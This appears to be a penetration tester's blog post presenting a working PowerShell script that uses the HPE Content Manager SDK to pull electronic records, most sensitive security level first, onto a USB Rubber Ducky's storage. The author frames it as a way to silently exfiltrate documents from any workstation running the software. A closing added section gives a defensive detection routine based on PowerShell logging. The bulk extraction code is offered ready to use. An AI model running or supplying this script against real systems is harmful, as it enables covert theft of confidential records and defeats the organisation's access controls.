Exfiltrating Electronic Documents from Content Manager
I'm loving PowerShell more and more! The capabilities are outstanding and never-ending. This can be both a blessing and a curse though, as it exposes functionality many administrators would loathe (if only they knew about the risks!).
For instance, I just wrote a script to use as part of a pentest. The ultimate goal of this pentest is to exfiltrate documents via a USB Rubber Ducky. To accomplish that I need a lightweight script tailored to the scenario.
We can break down the script into 5 major pieces of logic:
- Set up the script
- Connect to CM
- Find and process security levels
- Find records for the levels
- Extract the files
With all this in place I'll create a ducky script to be compiled and placed on my Rubber Ducky. Then I can stick that into any workstation where Content Manager has been installed and silently extract as much content as I'd like. Take a look at the script below!
Set up the script
First things first, I need to import the Content Manager namespace. I accomplish that by using Add-Type and pointing to the default installation location. Now that won't work in all environments, but it's sufficient for my pentest.
Second, the USB Rubber Ducky will be inserted into the computer and then assigned a drive letter by Windows. I won't know the drive letter, but I need it! So I use Get-Location to retrieve the drive letter and then tack on an "R" to represent where I want my records to be placed.
Lastly, I fetch the current amount of free space on the MicroSD card I'll insert into the ducky. My current hardware is limited to an 8 GB SD card, but after each exfiltration I'll swap out the card. In case I don't, I don't want errors because I hardcoded the maximum amount to extract. I also prepare a variable to track how much data I've extracted.
    # Load the Content Manager SDK from the default installation path
    Add-Type -Path "C:\Program Files\Hewlett Packard Enterprise\Content Manager\HP.HPTRIM.SDK.dll"
    # Drive letter of the current location, and the output folder on it
    $rootDrive = (get-location).Drive.Name
    $rootPath = "$($rootDrive):\r"
    # Free space on that drive is the upper bound for extraction
    $maxVolume = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='$($rootDrive):'" | Foreach-Object {$_.FreeSpace}
    # Running total of bytes extracted so far
    $curVolume = [long]0
Connect to CM
I don't really need much code for this task, but I'm considering it to be a distinct task in my pentest. That's because I may want to expand upon the logic. I envision dynamically determining the various datasets available on the workstation and then repeating the extraction for each dataset (or possibly doing some reconnaissance and then inserting server names or dataset IDs).
    $db = New-Object HP.HPTRIM.SDK.Database
Find and process security levels
There's not really much of a reason to exfiltrate public electronic records, right? So I want to ensure that I'm focusing on the secured stuff first. To do that I need to search for all the available levels and then process them in reverse order.
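    # Search every security level, sorted by level number in descending order
    $levels = New-Object HP.HPTRIM.SDK.TrimMainObjectSearch -ArgumentList $db, SecurityLevel
    $levels.SearchString = "all"
    $levels.SetSortString("levelNumber-")
    foreach ( $level in $levels ) {
        #insert record logic here
        # Stop once the extracted total reaches the free space on the drive
        if ( [long]$curVolume -ge [long]$maxVolume ) {
            break;
        }
    }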
Find and process records
At this point in the script I've got everything I need to search for records, so I just need to craft the search string and execute it. Then I can process each record!
    # Search electronic records at the current security level, newest first
    $recs = New-Object HP.HPTRIM.SDK.TrimMainObjectSearch -ArgumentList $db, Record
    $searchString = "securityLevel:$($level.LevelNumber) electronic"
    $recs.SearchString = $searchString
    $recs.SetSortString('createdOn-')
    foreach ( $result in $recs ) {
        $rec = [HP.HPTRIM.SDK.Record]$result
        # Add this document's size to the running total before writing it
        [long]$curVolume += [long]$rec.DocumentSize
        if ( [long]$curVolume -lt [long]$maxVolume ) {
            $sp = Join-Path $rootPath $rec.SuggestedFileName
            $rec.GetDocument($sp)
        } else {
            break;
        }
    }
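For the administrators mentioned at the top, the script above leaves recognisable strings behind when PowerShell script block logging is enabled. The following is an added example, not part of the original post: it correlates those strings per host and process and flags sessions that both use the SDK and write documents to disk. The event field names (Computer, ProcessId, Text), the function names and the sample events are assumptions constructed for illustration.

```powershell
# Added example: indicator patterns are taken from the script on this page.
$Indicators = [ordered]@{
    SdkLoad     = 'Add-Type\s.*HP\.HPTRIM\.SDK\.dll'
    DbConnect   = 'New-Object\s+HP\.HPTRIM\.SDK\.Database'
    Search      = 'HP\.HPTRIM\.SDK\.TrimMainObjectSearch'
    LevelSearch = 'securityLevel:'
    FileExtract = '\.GetDocument\s*\('
}

# Constructed sample events, shaped like fields exported from script block logs.
$events = @(
    [pscustomobject]@{ Computer='WS-01'; ProcessId=4120; Text='Add-Type -Path "C:\Program Files\Hewlett Packard Enterprise\Content Manager\HP.HPTRIM.SDK.dll"' }
    [pscustomobject]@{ Computer='WS-01'; ProcessId=4120; Text='$recs = New-Object HP.HPTRIM.SDK.TrimMainObjectSearch -ArgumentList $db, Record' }
    [pscustomobject]@{ Computer='WS-01'; ProcessId=4120; Text='$recs.SearchString = "securityLevel:$($level.LevelNumber) electronic"' }
    [pscustomobject]@{ Computer='WS-01'; ProcessId=4120; Text='$rec.GetDocument($sp)' }
    [pscustomobject]@{ Computer='WS-02'; ProcessId=988;  Text='Get-ChildItem C:\Reports | Measure-Object' }
)

function Get-CmSdkIndicator {
    # Return the name of every indicator whose pattern matches the text.
    param([Parameter(Mandatory)][string]$Text)
    foreach ($name in $Indicators.Keys) {
        if ($Text -match $Indicators[$name]) { $name }
    }
}

function Find-CmBulkExtraction {
    # Indicators may be spread over several script blocks, so correlate per host and process.
    param([Parameter(Mandatory)][object[]]$Events)
    $Events | Group-Object Computer, ProcessId | ForEach-Object {
        $group = $_.Group
        $hits = @($group | ForEach-Object { Get-CmSdkIndicator -Text $_.Text } | Sort-Object -Unique)
        $usesSdk = @($hits | Where-Object { $_ -in 'SdkLoad','DbConnect','Search' }).Count -gt 0
        if ($usesSdk -and ($hits -contains 'FileExtract')) {
            [pscustomobject]@{
                Computer   = $group[0].Computer
                ProcessId  = $group[0].ProcessId
                Indicators = $hits -join ','
                # Searching by security level alongside extraction is the page's exact pattern.
                Severity   = if ($hits -contains 'LevelSearch') { 'High' } else { 'Medium' }
            }
        }
    }
}

Find-CmBulkExtraction -Events $events | Format-Table -AutoSize
```

On a live system the same text comes from Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log. Legitimate SDK automation will also match, so baseline the hosts and accounts that are expected to run it.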